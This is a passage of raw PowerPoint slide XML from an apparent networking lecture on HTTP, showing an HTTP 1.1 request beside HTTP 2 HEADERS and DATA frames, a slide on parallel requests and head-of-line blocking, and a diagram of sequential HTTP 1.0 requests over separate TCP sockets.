                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E15FF143-75FC-3BB1-4156-8FF0564B5929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203201" y="5330961"/>
            <a:ext cx="5829464" cy="2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Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle: Rounded Corners 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7ED8F60-879F-DF36-A949-23874E45F820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561605" y="1727249"/>
            <a:ext cx="2578806" cy="6201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HTTP 1.1 Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle: Rounded Corners 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB89FA22-E4BE-8DD4-2CC4-D9D772226AC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7459742" y="1759628"/>
            <a:ext cx="2578806" cy="6201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HTTP 2 Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BFF7DF5-BF5B-F3B9-C005-BBC2ADE8F48A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6159337" y="2529089"/>
            <a:ext cx="5432961" cy="3419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HEADERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:method: post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:path: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_account.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:scheme: https</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:authority: facebook.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhtml+xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user-agent: Mozilla/5.0 Chrome/65.0.3323.51</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>accept-encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip,deflate,sdch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>accept-language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>content-type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EECEC0D7-E3DF-2F92-FEB1-EC9B6BA73F86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172142" y="5948254"/>
            <a:ext cx="5829464" cy="55621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5056" indent="-31252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37584" indent="-31252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0112"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62640" indent="-31252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ptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw&amp;email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cbw@ccs.neu.edu&amp;job</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020B0009020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=professor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3938706328"/>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C173-FDC2-FA97-F83E-8603EF7E5C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parallel Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE3B1654-A30F-1582-B453-7392F17E73EF}"/>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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E945684-8D7B-8CB7-0666-0258962304FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple HTTP 2 requests may be made in parallel over a single TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP 2 implements basic flow control, so small requests can make progressive even if a large request is going slowly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collectively, these features prevent head-of-line blocking at the HTTP-level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Head-of-line blocking at the TCP-level may still occur</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24274966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DB1F01C-30E8-1DC2-335C-5986F1C3371F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3175200" y="1663519"/>
            <a:ext cx="5688000" cy="1533281"/>
            <a:chOff x="3175200" y="936319"/>
            <a:chExt cx="5688000" cy="1533281"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30446552-F7FA-FCA2-9BE4-DB38625E9E57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3175200" y="1296000"/>
              <a:ext cx="5688000" cy="117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D0EA90-31CB-12CC-EC23-45D16D041A2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5160397" y="936319"/>
              <a:ext cx="1710405" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>TCP Socket #1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766342" y="1775023"/>
            <a:ext cx="2094335"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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9282589" y="1771867"/>
            <a:ext cx="2094335"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="2163791"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="3745695"/>
              <a:ext cx="5250715" cy="2378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64425" y="3387776"/>
              <a:ext cx="2435027" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /foo.html HTTP/1.0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="2633203"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="3774593"/>
              <a:ext cx="524279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175" y="1498497"/>
            <a:ext cx="1005227" cy="100522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1768" y="1610278"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED7A7F6-2BF2-7BCF-FA99-CEF78EB706F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203200" y="228600"/>
            <a:ext cx="117856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a:t>Review: HTTP 1.0 Sequential Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="64" name="Group 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD96D3D-2B2A-CA63-7F43-BB4D21A12886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3175200" y="3433800"/>
            <a:ext cx="5688000" cy="1533281"/>
            <a:chOff x="3175200" y="936319"/>
            <a:chExt cx="5688000" cy="1533281"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Rectangle 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C21212D8-BAFA-278D-E037-92C998E93A9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3175200" y="1296000"/>
              <a:ext cx="5688000" cy="11736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E01EB70-5F15-1EA3-D737-A59971D0A5C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5160397" y="936319"/>
              <a:ext cx="1691873" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>TCP Socket #2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="67" name="Group 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{938E25A6-9B62-C9D4-C769-B12FC37137F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="3934072"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="68" name="Straight Arrow Connector 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45FD5564-AFE3-659E-04FB-018A0C8C009E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="3745695"/>
              <a:ext cx="5250715" cy="2378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9C30689-FC7B-FD4F-61AE-B94E3B071703}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5163304" y="3387776"/>
              <a:ext cx="2437270" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /bar.html HTTP/1.0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="70" name="Group 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{461315CC-DA46-042F-1621-109614AFBBD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="4403484"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="71" name="Straight Arrow Connector 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EE84CF5-5D15-09C4-499F-309D22B90D17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="3774593"/>
              <a:ext cx="524279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9568168-D684-3AF2-39C9-09362BFF4A01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="76" name="Group 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F394E2-83F2-BAAE-D7AD-198DD1A09328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3175200" y="5194481"/>
            <a:ext cx="5688000" cy="1533281"/>
            <a:chOff x="3175200" y="936319"/>
            <a:chExt cx="5688000" cy="1533281"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975C82BC-1067-B1BF-1B99-7049EA8584D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3175200" y="1296000"/>
              <a:ext cx="5688000" cy="1173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0D57D697-0D46-75E9-1F57-D625E01DB3F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5160397" y="936319"/>
              <a:ext cx="1691873" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>TCP Socket #3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79" name="Group 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2942FB36-ED9D-E92B-CC62-CF7FA98319EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="5694753"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="80" name="Straight Arrow Connector 79">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB01A40A-D528-C4F1-CBF7-20DF602159E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="3745695"/>
              <a:ext cx="5250715" cy="2378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95AFEEBD-9A3D-AC95-293F-DB489BE98067}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5139451" y="3387776"/>
